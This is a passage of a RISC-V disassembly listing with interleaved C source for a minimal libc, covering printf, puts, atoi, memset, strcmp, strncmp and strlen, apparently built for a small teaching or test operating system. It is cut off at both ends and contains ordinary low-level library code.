} while ((x /= base) != 0); 1238: 10e86363 bltu a6,a4,133e <printint.constprop.0+0x20a> buf[i--] = digits[x % base]; 123c: 1782 slli a5,a5,0x20 123e: 9381 srli a5,a5,0x20 1240: 97b2 add a5,a5,a2 1242: 0007c783 lbu a5,0(a5) 1246: 4599 li a1,6 1248: 00f10723 sb a5,14(sp) if (sign) 124c: 00055763 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 1250: 02d00793 li a5,45 1254: 00f106a3 sb a5,13(sp) buf[i--] = digits[x % base]; 1258: 4595 li a1,5 write(f, s, l); 125a: 003c addi a5,sp,8 125c: 4641 li a2,16 125e: 9e0d subw a2,a2,a1 1260: 4505 li a0,1 1262: 95be add a1,a1,a5 1264: 291000ef jal ra,1cf4 <write> i++; if (i < 0) puts("printint error"); out(stdout, buf + i, 16 - i); } 1268: 70a2 ld ra,40(sp) 126a: 6145 addi sp,sp,48 126c: 8082 ret x = -xx; 126e: 40a0083b negw a6,a0 buf[i--] = digits[x % base]; 1272: 02b877bb remuw a5,a6,a1 1276: 00001617 auipc a2,0x1 127a: e4260613 addi a2,a2,-446 # 20b8 <digits> buf[16] = 0; 127e: 00010c23 sb zero,24(sp) buf[i--] = digits[x % base]; 1282: 0005871b sext.w a4,a1 1286: 1782 slli a5,a5,0x20 1288: 9381 srli a5,a5,0x20 128a: 97b2 add a5,a5,a2 128c: 0007c783 lbu a5,0(a5) } while ((x /= base) != 0); 1290: 02b858bb divuw a7,a6,a1 buf[i--] = digits[x % base]; 1294: 00f10ba3 sb a5,23(sp) } while ((x /= base) != 0); 1298: 06b86963 bltu a6,a1,130a <printint.constprop.0+0x1d6> buf[i--] = digits[x % base]; 129c: 02e8f7bb remuw a5,a7,a4 12a0: 1782 slli a5,a5,0x20 12a2: 9381 srli a5,a5,0x20 12a4: 97b2 add a5,a5,a2 12a6: 0007c783 lbu a5,0(a5) } while ((x /= base) != 0); 12aa: 02e8d6bb divuw a3,a7,a4 buf[i--] = digits[x % base]; 12ae: 00f10b23 sb a5,22(sp) } while ((x /= base) != 0); 12b2: ece8f8e3 bgeu a7,a4,1182 <printint.constprop.0+0x4e> buf[i--] = '-'; 12b6: 02d00793 li a5,45 12ba: 00f10aa3 sb a5,21(sp) buf[i--] = digits[x % base]; 12be: 45b5 li a1,13 12c0: bf69 j 125a <printint.constprop.0+0x126> 12c2: 45a9 li a1,10 if (sign) 12c4: f8055be3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 12c8: 02d00793 li a5,45 12cc: 00f108a3 sb a5,17(sp) buf[i--] = digits[x % base]; 12d0: 45a5 li a1,9 12d2: b761 j 125a <printint.constprop.0+0x126> 12d4: 45b5 li a1,13 if (sign) 12d6: f80552e3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 12da: 02d00793 li a5,45 12de: 00f10a23 sb a5,20(sp) buf[i--] = digits[x % base]; 12e2: 45b1 li a1,12 12e4: bf9d j 125a <printint.constprop.0+0x126> 12e6: 45b1 li a1,12 if (sign) 12e8: f60559e3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 12ec: 02d00793 li a5,45 12f0: 00f109a3 sb a5,19(sp) buf[i--] = digits[x % base]; 12f4: 45ad li a1,11 12f6: b795 j 125a <printint.constprop.0+0x126> 12f8: 45ad li a1,11 if (sign) 12fa: f60550e3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 12fe: 02d00793 li a5,45 1302: 00f10923 sb a5,18(sp) buf[i--] = digits[x % base]; 1306: 45a9 li a1,10 1308: bf89 j 125a <printint.constprop.0+0x126> buf[i--] = '-'; 130a: 02d00793 li a5,45 130e: 00f10b23 sb a5,22(sp) buf[i--] = digits[x % base]; 1312: 45b9 li a1,14 1314: b799 j 125a <printint.constprop.0+0x126> 1316: 45a5 li a1,9 if (sign) 1318: f40551e3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 131c: 02d00793 li a5,45 1320: 00f10823 sb a5,16(sp) buf[i--] = digits[x % base]; 1324: 45a1 li a1,8 1326: bf15 j 125a <printint.constprop.0+0x126> i = 15; 1328: 45bd li a1,15 132a: bf05 j 125a <printint.constprop.0+0x126> buf[i--] = digits[x % base]; 132c: 45a1 li a1,8 if (sign) 132e: f20556e3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 1332: 02d00793 li a5,45 1336: 00f107a3 sb a5,15(sp) buf[i--] = digits[x % base]; 133a: 459d li a1,7 133c: bf39 j 125a <printint.constprop.0+0x126> 133e: 459d li a1,7 if (sign) 1340: f0055de3 bgez a0,125a <printint.constprop.0+0x126> buf[i--] = '-'; 1344: 02d00793 li a5,45 1348: 00f10723 sb a5,14(sp) buf[i--] = digits[x % base]; 134c: 4599 li a1,6 134e: b731 j 125a <printint.constprop.0+0x126> 0000000000001350 <getchar>: { 1350: 1101 addi sp,sp,-32 read(stdin, &byte, 1); 1352: 00f10593 addi a1,sp,15 1356: 4605 li a2,1 1358: 4501 li a0,0 { 135a: ec06 sd ra,24(sp) char byte = 0; 135c: 000107a3 sb zero,15(sp) read(stdin, &byte, 1); 1360: 18b000ef jal ra,1cea <read> } 1364: 60e2 ld ra,24(sp) 1366: 00f14503 lbu a0,15(sp) 136a: 6105 addi sp,sp,32 136c: 8082 ret 000000000000136e <putchar>: { 136e: 1101 addi sp,sp,-32 1370: 87aa mv a5,a0 return write(stdout, &byte, 1); 1372: 00f10593 addi a1,sp,15 1376: 4605 li a2,1 1378: 4505 li a0,1 { 137a: ec06 sd ra,24(sp) char byte = c; 137c: 00f107a3 sb a5,15(sp) return write(stdout, &byte, 1); 1380: 175000ef jal ra,1cf4 <write> } 1384: 60e2 ld ra,24(sp) 1386: 2501 sext.w a0,a0 1388: 6105 addi sp,sp,32 138a: 8082 ret 000000000000138c <puts>: { 138c: 1141 addi sp,sp,-16 138e: e406 sd ra,8(sp) 1390: e022 sd s0,0(sp) 1392: 842a mv s0,a0 r = -(write(stdout, s, strlen(s)) < 0); 1394: 57c000ef jal ra,1910 <strlen> 1398: 862a mv a2,a0 139a: 85a2 mv a1,s0 139c: 4505 li a0,1 139e: 157000ef jal ra,1cf4 <write> } 13a2: 60a2 ld ra,8(sp) 13a4: 6402 ld s0,0(sp) r = -(write(stdout, s, strlen(s)) < 0); 13a6: 957d srai a0,a0,0x3f return r; 13a8: 2501 sext.w a0,a0 } 13aa: 0141 addi sp,sp,16 13ac: 8082 ret 00000000000013ae <printf>: out(stdout, buf, i); } // Print to the console. only understands %d, %x, %p, %s. void printf(const char *fmt, ...) { 13ae: 7171 addi sp,sp,-176 13b0: fc56 sd s5,56(sp) 13b2: ed3e sd a5,152(sp) buf[i++] = '0'; 13b4: 7ae1 lui s5,0xffff8 va_list ap; int cnt = 0, l = 0; char *a, *z, *s = (char *)fmt, str; int f = stdout; va_start(ap, fmt); 13b6: 18bc addi a5,sp,120 { 13b8: e8ca sd s2,80(sp) 13ba: e4ce sd s3,72(sp) 13bc: e0d2 sd s4,64(sp) 13be: f85a sd s6,48(sp) 13c0: f486 sd ra,104(sp) 13c2: f0a2 sd s0,96(sp) 13c4: eca6 sd s1,88(sp) 13c6: fcae sd a1,120(sp) 13c8: e132 sd a2,128(sp) 13ca: e536 sd a3,136(sp) 13cc: e93a sd a4,144(sp) 13ce: f142 sd a6,160(sp) 13d0: f546 sd a7,168(sp) va_start(ap, fmt); 13d2: e03e sd a5,0(sp) for (;;) { if (!*s) break; for (a = s; *s && *s != '%'; s++) 13d4: 02500913 li s2,37 out(f, a, l); if (l) continue; if (s[1] == 0) break; switch (s[1]) 13d8: 07300a13 li s4,115 case 'p': printptr(va_arg(ap, uint64)); break; case 's': if ((a = va_arg(ap, char *)) == 0) a = "(null)"; 13dc: 00001b17 auipc s6,0x1 13e0: c2cb0b13 addi s6,s6,-980 # 2008 <__clone+0xdc> buf[i++] = '0'; 13e4: 830aca93 xori s5,s5,-2000 buf[i++] = digits[x >> (sizeof(uint64) * 8 - 4)]; 13e8: 00001997 auipc s3,0x1 13ec: cd098993 addi s3,s3,-816 # 20b8 <digits> if (!*s) 13f0: 00054783 lbu a5,0(a0) 13f4: 16078a63 beqz a5,1568 <printf+0x1ba> 13f8: 862a mv a2,a0 for (a = s; *s && *s != '%'; s++) 13fa: 19278163 beq a5,s2,157c <printf+0x1ce> 13fe: 00164783 lbu a5,1(a2) 1402: 0605 addi a2,a2,1 1404: fbfd bnez a5,13fa <printf+0x4c> 1406: 84b2 mv s1,a2 l = z - a; 1408: 40a6043b subw s0,a2,a0 write(f, s, l); 140c: 85aa mv a1,a0 140e: 8622 mv a2,s0 1410: 4505 li a0,1 1412: 0e3000ef jal ra,1cf4 <write> if (l) 1416: 18041c63 bnez s0,15ae <printf+0x200> if (s[1] == 0) 141a: 0014c783 lbu a5,1(s1) 141e: 14078563 beqz a5,1568 <printf+0x1ba> switch (s[1]) 1422: 1d478063 beq a5,s4,15e2 <printf+0x234> 1426: 18fa6663 bltu s4,a5,15b2 <printf+0x204> 142a: 06400713 li a4,100 142e: 1ae78063 beq a5,a4,15ce <printf+0x220> 1432: 07000713 li a4,112 1436: 1ce79963 bne a5,a4,1608 <printf+0x25a> printptr(va_arg(ap, uint64)); 143a: 6702 ld a4,0(sp) buf[i++] = '0'; 143c: 01511423 sh s5,8(sp) write(f, s, l); 1440: 4649 li a2,18 printptr(va_arg(ap, uint64)); 1442: 631c ld a5,0(a4) 1444: 0721 addi a4,a4,8 1446: e03a sd a4,0(sp) for (j = 0; j < (sizeof(uint64) * 2); j++, x <<= 4) 1448: 00479293 slli t0,a5,0x4 144c: 00879f93 slli t6,a5,0x8 1450: 00c79f13 slli t5,a5,0xc 1454: 01079e93 slli t4,a5,0x10 1458: 01479e13 slli t3,a5,0x14 145c: 01879313 slli t1,a5,0x18 1460: 01c79893 slli a7,a5,0x1c 1464: 02479813 slli a6,a5,0x24 1468: 02879513 slli a0,a5,0x28 146c: 02c79593 slli a1,a5,0x2c 1470: 03079693 slli a3,a5,0x30 1474: 03479713 slli a4,a5,0x34 buf[i++] = digits[x >> (sizeof(uint64) * 8 - 4)]; 1478: 03c7d413 srli s0,a5,0x3c 147c: 01c7d39b srliw t2,a5,0x1c 1480: 03c2d293 srli t0,t0,0x3c 1484: 03cfdf93 srli t6,t6,0x3c 1488: 03cf5f13 srli t5,t5,0x3c 148c: 03cede93 srli t4,t4,0x3c 1490: 03ce5e13 srli t3,t3,0x3c 1494: 03c35313 srli t1,t1,0x3c 1498: 03c8d893 srli a7,a7,0x3c 149c: 03c85813 srli a6,a6,0x3c 14a0: 9171 srli a0,a0,0x3c 14a2: 91f1 srli a1,a1,0x3c 14a4: 92f1 srli a3,a3,0x3c 14a6: 9371 srli a4,a4,0x3c 14a8: 96ce add a3,a3,s3 14aa: 974e add a4,a4,s3 14ac: 944e add s0,s0,s3 14ae: 92ce add t0,t0,s3 14b0: 9fce add t6,t6,s3 14b2: 9f4e add t5,t5,s3 14b4: 9ece add t4,t4,s3 14b6: 9e4e add t3,t3,s3 14b8: 934e add t1,t1,s3 14ba: 98ce add a7,a7,s3 14bc: 93ce add t2,t2,s3 14be: 984e add a6,a6,s3 14c0: 954e add a0,a0,s3 14c2: 95ce add a1,a1,s3 14c4: 0006c083 lbu ra,0(a3) 14c8: 0002c283 lbu t0,0(t0) 14cc: 00074683 lbu a3,0(a4) 14d0: 000fcf83 lbu t6,0(t6) 14d4: 000f4f03 lbu t5,0(t5) 14d8: 000ece83 lbu t4,0(t4) 14dc: 000e4e03 lbu t3,0(t3) 14e0: 00034303 lbu t1,0(t1) 14e4: 0008c883 lbu a7,0(a7) 14e8: 0003c383 lbu t2,0(t2) 14ec: 00084803 lbu a6,0(a6) 14f0: 00054503 lbu a0,0(a0) 14f4: 0005c583 lbu a1,0(a1) 14f8: 00044403 lbu s0,0(s0) for (j = 0; j < (sizeof(uint64) * 2); j++, x <<= 4) 14fc: 03879713 slli a4,a5,0x38 buf[i++] = digits[x >> (sizeof(uint64) * 8 - 4)]; 1500: 9371 srli a4,a4,0x3c 1502: 8bbd andi a5,a5,15 1504: 974e add a4,a4,s3 1506: 97ce add a5,a5,s3 1508: 005105a3 sb t0,11(sp) 150c: 01f10623 sb t6,12(sp) 1510: 01e106a3 sb t5,13(sp) 1514: 01d10723 sb t4,14(sp) 1518: 01c107a3 sb t3,15(sp) 151c: 00610823 sb t1,16(sp) 1520: 011108a3 sb a7,17(sp) 1524: 00710923 sb t2,18(sp) 1528: 010109a3 sb a6,19(sp) 152c: 00a10a23 sb a0,20(sp) 1530: 00b10aa3 sb a1,21(sp) 1534: 00110b23 sb ra,22(sp) 1538: 00d10ba3 sb a3,23(sp) 153c: 00810523 sb s0,10(sp) 1540: 00074703 lbu a4,0(a4) 1544: 0007c783 lbu a5,0(a5) write(f, s, l); 1548: 002c addi a1,sp,8 154a: 4505 li a0,1 buf[i++] = digits[x >> (sizeof(uint64) * 8 - 4)]; 154c: 00e10c23 sb a4,24(sp) 1550: 00f10ca3 sb a5,25(sp) buf[i] = 0; 1554: 00010d23 sb zero,26(sp) write(f, s, l); 1558: 79c000ef jal ra,1cf4 <write> // Print unknown % sequence to draw attention. putchar('%'); putchar(s[1]); break; } s += 2; 155c: 00248513 addi a0,s1,2 if (!*s) 1560: 00054783 lbu a5,0(a0) 1564: e8079ae3 bnez a5,13f8 <printf+0x4a> } va_end(ap); } 1568: 70a6 ld ra,104(sp) 156a: 7406 ld s0,96(sp) 156c: 64e6 ld s1,88(sp) 156e: 6946 ld s2,80(sp) 1570: 69a6 ld s3,72(sp) 1572: 6a06 ld s4,64(sp) 1574: 7ae2 ld s5,56(sp) 1576: 7b42 ld s6,48(sp) 1578: 614d addi sp,sp,176 157a: 8082 ret for (z = s; s[0] == '%' && s[1] == '%'; z++, s += 2) 157c: 00064783 lbu a5,0(a2) 1580: 84b2 mv s1,a2 1582: 01278963 beq a5,s2,1594 <printf+0x1e6> 1586: b549 j 1408 <printf+0x5a> 1588: 0024c783 lbu a5,2(s1) 158c: 0605 addi a2,a2,1 158e: 0489 addi s1,s1,2 1590: e7279ce3 bne a5,s2,1408 <printf+0x5a> 1594: 0014c783 lbu a5,1(s1) 1598: ff2788e3 beq a5,s2,1588 <printf+0x1da> l = z - a; 159c: 40a6043b subw s0,a2,a0 write(f, s, l); 15a0: 85aa mv a1,a0 15a2: 8622 mv a2,s0 15a4: 4505 li a0,1 15a6: 74e000ef jal ra,1cf4 <write> if (l) 15aa: e60408e3 beqz s0,141a <printf+0x6c> 15ae: 8526 mv a0,s1 15b0: b581 j 13f0 <printf+0x42> switch (s[1]) 15b2: 07800713 li a4,120 15b6: 04e79963 bne a5,a4,1608 <printf+0x25a> printint(va_arg(ap, int), 16, 1); 15ba: 6782 ld a5,0(sp) 15bc: 45c1 li a1,16 15be: 4388 lw a0,0(a5) 15c0: 07a1 addi a5,a5,8 15c2: e03e sd a5,0(sp) 15c4: b71ff0ef jal ra,1134 <printint.constprop.0> s += 2; 15c8: 00248513 addi a0,s1,2 15cc: bf51 j 1560 <printf+0x1b2> printint(va_arg(ap, int), 10, 1); 15ce: 6782 ld a5,0(sp) 15d0: 45a9 li a1,10 15d2: 4388 lw a0,0(a5) 15d4: 07a1 addi a5,a5,8 15d6: e03e sd a5,0(sp) 15d8: b5dff0ef jal ra,1134 <printint.constprop.0> s += 2; 15dc: 00248513 addi a0,s1,2 15e0: b741 j 1560 <printf+0x1b2> if ((a = va_arg(ap, char *)) == 0) 15e2: 6782 ld a5,0(sp) 15e4: 6380 ld s0,0(a5) 15e6: 07a1 addi a5,a5,8 15e8: e03e sd a5,0(sp) 15ea: c031 beqz s0,162e <printf+0x280> l = strnlen(a, 200); 15ec: 0c800593 li a1,200 15f0: 8522 mv a0,s0 15f2: 40a000ef jal ra,19fc <strnlen> write(f, s, l); 15f6: 0005061b sext.w a2,a0 15fa: 85a2 mv a1,s0 15fc: 4505 li a0,1 15fe: 6f6000ef jal ra,1cf4 <write> s += 2; 1602: 00248513 addi a0,s1,2 1606: bfa9 j 1560 <printf+0x1b2> return write(stdout, &byte, 1); 1608: 4605 li a2,1 160a: 002c addi a1,sp,8 160c: 4505 li a0,1 char byte = c; 160e: 01210423 sb s2,8(sp) return write(stdout, &byte, 1); 1612: 6e2000ef jal ra,1cf4 <write> char byte = c; 1616: 0014c783 lbu a5,1(s1) return write(stdout, &byte, 1); 161a: 4605 li a2,1 161c: 002c addi a1,sp,8 161e: 4505 li a0,1 char byte = c; 1620: 00f10423 sb a5,8(sp) return write(stdout, &byte, 1); 1624: 6d0000ef jal ra,1cf4 <write> s += 2; 1628: 00248513 addi a0,s1,2 162c: bf15 j 1560 <printf+0x1b2> a = "(null)"; 162e: 845a mv s0,s6 1630: bf75 j 15ec <printf+0x23e> 0000000000001632 <panic>: #include <stdlib.h> #include <stdio.h> #include <unistd.h> void panic(char *m) { 1632: 1141 addi sp,sp,-16 1634: e406 sd ra,8(sp) puts(m); 1636: d57ff0ef jal ra,138c <puts> exit(-100); } 163a: 60a2 ld ra,8(sp) exit(-100); 163c: f9c00513 li a0,-100 } 1640: 0141 addi sp,sp,16 exit(-100); 1642: a709 j 1d44 <exit> 0000000000001644 <isspace>: #define HIGHS (ONES * (UCHAR_MAX / 2 + 1)) #define HASZERO(x) (((x)-ONES) & ~(x)&HIGHS) int isspace(int c) { return c == ' ' || (unsigned)c - '\t' < 5; 1644: 02000793 li a5,32 1648: 00f50663 beq a0,a5,1654 <isspace+0x10> 164c: 355d addiw a0,a0,-9 164e: 00553513 sltiu a0,a0,5 1652: 8082 ret 1654: 4505 li a0,1 } 1656: 8082 ret 0000000000001658 <isdigit>: int isdigit(int c) { return (unsigned)c - '0' < 10; 1658: fd05051b addiw a0,a0,-48 } 165c: 00a53513 sltiu a0,a0,10 1660: 8082 ret 0000000000001662 <atoi>: return c == ' ' || (unsigned)c - '\t' < 5; 1662: 02000613 li a2,32 1666: 4591 li a1,4 int atoi(const char *s) { int n = 0, neg = 0; while (isspace(*s)) 1668: 00054703 lbu a4,0(a0) return c == ' ' || (unsigned)c - '\t' < 5; 166c: ff77069b addiw a3,a4,-9 1670: 04c70d63 beq a4,a2,16ca <atoi+0x68> 1674: 0007079b sext.w a5,a4 1678: 04d5f963 bgeu a1,a3,16ca <atoi+0x68> s++; switch (*s) 167c: 02b00693 li a3,43 1680: 04d70a63 beq a4,a3,16d4 <atoi+0x72> 1684: 02d00693 li a3,45 1688: 06d70463 beq a4,a3,16f0 <atoi+0x8e> neg = 1; case '+': s++; } /* Compute n as a negative number to avoid overflow on INT_MIN */ while (isdigit(*s)) 168c: fd07859b addiw a1,a5,-48 1690: 4625 li a2,9 1692: 873e mv a4,a5 1694: 86aa mv a3,a0 int n = 0, neg = 0; 1696: 4e01 li t3,0 while (isdigit(*s)) 1698: 04b66a63 bltu a2,a1,16ec <atoi+0x8a> int n = 0, neg = 0; 169c: 4501 li a0,0 while (isdigit(*s)) 169e: 4825 li a6,9 16a0: 0016c603 lbu a2,1(a3) n = 10 * n - (*s++ - '0'); 16a4: 0025179b slliw a5,a0,0x2 16a8: 9d3d addw a0,a0,a5 16aa: fd07031b addiw t1,a4,-48 16ae: 0015189b slliw a7,a0,0x1 while (isdigit(*s)) 16b2: fd06059b addiw a1,a2,-48 n = 10 * n - (*s++ - '0'); 16b6: 0685 addi a3,a3,1 16b8: 4068853b subw a0,a7,t1 while (isdigit(*s)) 16bc: 0006071b sext.w a4,a2 16c0: feb870e3 bgeu a6,a1,16a0 <atoi+0x3e> return neg ? n : -n; 16c4: 000e0563 beqz t3,16ce <atoi+0x6c> } 16c8: 8082 ret s++; 16ca: 0505 addi a0,a0,1 16cc: bf71 j 1668 <atoi+0x6> return neg ? n : -n; 16ce: 4113053b subw a0,t1,a7 16d2: 8082 ret while (isdigit(*s)) 16d4: 00154783 lbu a5,1(a0) 16d8: 4625 li a2,9 s++; 16da: 00150693 addi a3,a0,1 while (isdigit(*s)) 16de: fd07859b addiw a1,a5,-48 16e2: 0007871b sext.w a4,a5 int n = 0, neg = 0; 16e6: 4e01 li t3,0 while (isdigit(*s)) 16e8: fab67ae3 bgeu a2,a1,169c <atoi+0x3a> 16ec: 4501 li a0,0 } 16ee: 8082 ret while (isdigit(*s)) 16f0: 00154783 lbu a5,1(a0) 16f4: 4625 li a2,9 s++; 16f6: 00150693 addi a3,a0,1 while (isdigit(*s)) 16fa: fd07859b addiw a1,a5,-48 16fe: 0007871b sext.w a4,a5 1702: feb665e3 bltu a2,a1,16ec <atoi+0x8a> neg = 1; 1706: 4e05 li t3,1 1708: bf51 j 169c <atoi+0x3a> 000000000000170a <memset>: void *memset(void *dest, int c, size_t n) { char *p = dest; for (int i = 0; i < n; ++i, *(p++) = c) 170a: 16060d63 beqz a2,1884 <memset+0x17a> 170e: 40a007b3 neg a5,a0 1712: 8b9d andi a5,a5,7 1714: 00778713 addi a4,a5,7 1718: 482d li a6,11 171a: 0ff5f593 zext.b a1,a1 171e: fff60693 addi a3,a2,-1 1722: 17076263 bltu a4,a6,1886 <memset+0x17c> 1726: 16e6ea63 bltu a3,a4,189a <memset+0x190> 172a: 16078563 beqz a5,1894 <memset+0x18a> 172e: 00b50023 sb a1,0(a0) 1732: 4705 li a4,1 1734: 00150e93 addi t4,a0,1 1738: 14e78c63 beq a5,a4,1890 <memset+0x186> 173c: 00b500a3 sb a1,1(a0) 1740: 4709 li a4,2 1742: 00250e93 addi t4,a0,2 1746: 14e78d63 beq a5,a4,18a0 <memset+0x196> 174a: 00b50123 sb a1,2(a0) 174e: 470d li a4,3 1750: 00350e93 addi t4,a0,3 1754: 12e78b63 beq a5,a4,188a <memset+0x180> 1758: 00b501a3 sb a1,3(a0) 175c: 4711 li a4,4 175e: 00450e93 addi t4,a0,4 1762: 14e78163 beq a5,a4,18a4 <memset+0x19a> 1766: 00b50223 sb a1,4(a0) 176a: 4715 li a4,5 176c: 00550e93 addi t4,a0,5 1770: 12e78c63 beq a5,a4,18a8 <memset+0x19e> 1774: 00b502a3 sb a1,5(a0) 1778: 471d li a4,7 177a: 00650e93 addi t4,a0,6 177e: 12e79763 bne a5,a4,18ac <memset+0x1a2> 1782: 00750e93 addi t4,a0,7 1786: 00b50323 sb a1,6(a0) 178a: 4f1d li t5,7 178c: 00859713 slli a4,a1,0x8 1790: 8f4d or a4,a4,a1 1792: 01059e13 slli t3,a1,0x10 1796: 01c76e33 or t3,a4,t3 179a: 01859313 slli t1,a1,0x18 179e: 006e6333 or t1,t3,t1 17a2: 02059893 slli a7,a1,0x20 17a6: 011368b3 or a7,t1,a7 17aa: 02859813 slli a6,a1,0x28 17ae: 40f60333 sub t1,a2,a5 17b2: 0108e833 or a6,a7,a6 17b6: 03059693 slli a3,a1,0x30 17ba: 00d866b3 or a3,a6,a3 17be: 03859713 slli a4,a1,0x38 17c2: 97aa add a5,a5,a0 17c4: ff837813 andi a6,t1,-8 17c8: 8f55 or a4,a4,a3 17ca: 00f806b3 add a3,a6,a5 17ce: e398 sd a4,0(a5) 17d0: 07a1 addi a5,a5,8 17d2: fed79ee3 bne a5,a3,17ce <memset+0xc4> 17d6: ff837693 andi a3,t1,-8 17da: 00de87b3 add a5,t4,a3 17de: 01e6873b addw a4,a3,t5 17e2: 0ad30663 beq t1,a3,188e <memset+0x184> 17e6: 00b78023 sb a1,0(a5) 17ea: 0017069b addiw a3,a4,1 17ee: 08c6fb63 bgeu a3,a2,1884 <memset+0x17a> 17f2: 00b780a3 sb a1,1(a5) 17f6: 0027069b addiw a3,a4,2 17fa: 08c6f563 bgeu a3,a2,1884 <memset+0x17a> 17fe: 00b78123 sb a1,2(a5) 1802: 0037069b addiw a3,a4,3 1806: 06c6ff63 bgeu a3,a2,1884 <memset+0x17a> 180a: 00b781a3 sb a1,3(a5) 180e: 0047069b addiw a3,a4,4 1812: 06c6f963 bgeu a3,a2,1884 <memset+0x17a> 1816: 00b78223 sb a1,4(a5) 181a: 0057069b addiw a3,a4,5 181e: 06c6f363 bgeu a3,a2,1884 <memset+0x17a> 1822: 00b782a3 sb a1,5(a5) 1826: 0067069b addiw a3,a4,6 182a: 04c6fd63 bgeu a3,a2,1884 <memset+0x17a> 182e: 00b78323 sb a1,6(a5) 1832: 0077069b addiw a3,a4,7 1836: 04c6f763 bgeu a3,a2,1884 <memset+0x17a> 183a: 00b783a3 sb a1,7(a5) 183e: 0087069b addiw a3,a4,8 1842: 04c6f163 bgeu a3,a2,1884 <memset+0x17a> 1846: 00b78423 sb a1,8(a5) 184a: 0097069b addiw a3,a4,9 184e: 02c6fb63 bgeu a3,a2,1884 <memset+0x17a> 1852: 00b784a3 sb a1,9(a5) 1856: 00a7069b addiw a3,a4,10 185a: 02c6f563 bgeu a3,a2,1884 <memset+0x17a> 185e: 00b78523 sb a1,10(a5) 1862: 00b7069b addiw a3,a4,11 1866: 00c6ff63 bgeu a3,a2,1884 <memset+0x17a> 186a: 00b785a3 sb a1,11(a5) 186e: 00c7069b addiw a3,a4,12 1872: 00c6f963 bgeu a3,a2,1884 <memset+0x17a> 1876: 00b78623 sb a1,12(a5) 187a: 2735 addiw a4,a4,13 187c: 00c77463 bgeu a4,a2,1884 <memset+0x17a> 1880: 00b786a3 sb a1,13(a5) ; return dest; } 1884: 8082 ret 1886: 472d li a4,11 1888: bd79 j 1726 <memset+0x1c> for (int i = 0; i < n; ++i, *(p++) = c) 188a: 4f0d li t5,3 188c: b701 j 178c <memset+0x82> 188e: 8082 ret 1890: 4f05 li t5,1 1892: bded j 178c <memset+0x82> 1894: 8eaa mv t4,a0 1896: 4f01 li t5,0 1898: bdd5 j 178c <memset+0x82> 189a: 87aa mv a5,a0 189c: 4701 li a4,0 189e: b7a1 j 17e6 <memset+0xdc> 18a0: 4f09 li t5,2 18a2: b5ed j 178c <memset+0x82> 18a4: 4f11 li t5,4 18a6: b5dd j 178c <memset+0x82> 18a8: 4f15 li t5,5 18aa: b5cd j 178c <memset+0x82> 18ac: 4f19 li t5,6 18ae: bdf9 j 178c <memset+0x82> 00000000000018b0 <strcmp>: int strcmp(const char *l, const char *r) { for (; *l == *r && *l; l++, r++) 18b0: 00054783 lbu a5,0(a0) 18b4: 0005c703 lbu a4,0(a1) 18b8: 00e79863 bne a5,a4,18c8 <strcmp+0x18> 18bc: 0505 addi a0,a0,1 18be: 0585 addi a1,a1,1 18c0: fbe5 bnez a5,18b0 <strcmp> 18c2: 4501 li a0,0 ; return *(unsigned char *)l - *(unsigned char *)r; } 18c4: 9d19 subw a0,a0,a4 18c6: 8082 ret return *(unsigned char *)l - *(unsigned char *)r; 18c8: 0007851b sext.w a0,a5 18cc: bfe5 j 18c4 <strcmp+0x14> 00000000000018ce <strncmp>: int strncmp(const char *_l, const char *_r, size_t n) { const unsigned char *l = (void *)_l, *r = (void *)_r; if (!n--) 18ce: ce05 beqz a2,1906 <strncmp+0x38> return 0; for (; *l && *r && n && *l == *r; l++, r++, n--) 18d0: 00054703 lbu a4,0(a0) 18d4: 0005c783 lbu a5,0(a1) 18d8: cb0d beqz a4,190a <strncmp+0x3c> if (!n--) 18da: 167d addi a2,a2,-1 18dc: 00c506b3 add a3,a0,a2 18e0: a819 j 18f6 <strncmp+0x28> for (; *l && *r && n && *l == *r; l++, r++, n--) 18e2: 00a68e63 beq a3,a0,18fe <strncmp+0x30> 18e6: 0505 addi a0,a0,1 18e8: 00e79b63 bne a5,a4,18fe <strncmp+0x30> 18ec: 00054703 lbu a4,0(a0) ; return *l - *r; 18f0: 0005c783 lbu a5,0(a1) for (; *l && *r && n && *l == *r; l++, r++, n--) 18f4: cb19 beqz a4,190a <strncmp+0x3c> 18f6: 0005c783 lbu a5,0(a1) 18fa: 0585 addi a1,a1,1 18fc: f3fd bnez a5,18e2 <strncmp+0x14> return *l - *r; 18fe: 0007051b sext.w a0,a4 1902: 9d1d subw a0,a0,a5 1904: 8082 ret return 0; 1906: 4501 li a0,0 } 1908: 8082 ret 190a: 4501 li a0,0 return *l - *r; 190c: 9d1d subw a0,a0,a5 190e: 8082 ret 0000000000001910 <strlen>: size_t strlen(const char *s) { const char *a = s; typedef size_t __attribute__((__may_alias__)) word; const word *w; for (; (uintptr_t)s % SS; s++) 1910: 00757793 andi a5,a0,7 1914: cf89 beqz a5,192e <strlen+0x1e> 1916: 87aa mv a5,a0 1918: a029 j 1922 <strlen+0x12> 191a: 0785 addi a5,a5,1 191c: 0077f713 andi a4,a5,7 1920: cb01 beqz a4,1930 <strlen+0x20> if (!*s) 1922: 0007c703 lbu a4,0(a5) 1926: fb75 bnez a4,191a <strlen+0xa> for (w = (const void *)s; !HASZERO(*w); w++) ; s = (const void *)w; for (; *s; s++) ; return s - a; 1928: 40a78533 sub a0,a5,a0 } 192c: 8082 ret for (; (uintptr_t)s % SS; s++) 192e: 87aa mv a5,a0 for (w = (const void *)s; !HASZERO(*w); w++) 1930: 6394 ld a3,0(a5) 1932: 00000597 auipc a1,0x0 1936: 6de5b583 ld a1,1758(a1) # 2010 <__clone+0xe4> 193a: 00000617 auipc a2,0x0 193e: 6de63603 ld a2,1758(a2) # 2018 <__clone+0xec> 1942: a019 j 1948 <strlen+0x38> 1944: 6794 ld a3,8(a5) 1946: 07a1 addi a5,a5,8 1948: 00b68733 add a4,a3,a1 194c: fff6c693 not a3,a3 1950: 8f75 and a4,a4,a3 1952: 8f71 and a4,a4,a2 1954: db65 beqz a4,1944 <strlen+0x34> for (; *s; s++) 1956: 0007c703 lbu a4,0(a5) 195a: d779 beqz a4,1928 <strlen+0x18> 195c: 0017c703 lbu a4,1(a5) 1960: 0785 addi a5,a5,1 1962: d379 beqz a4,1928 <strlen+0x18> 1964: 0017c703 lbu 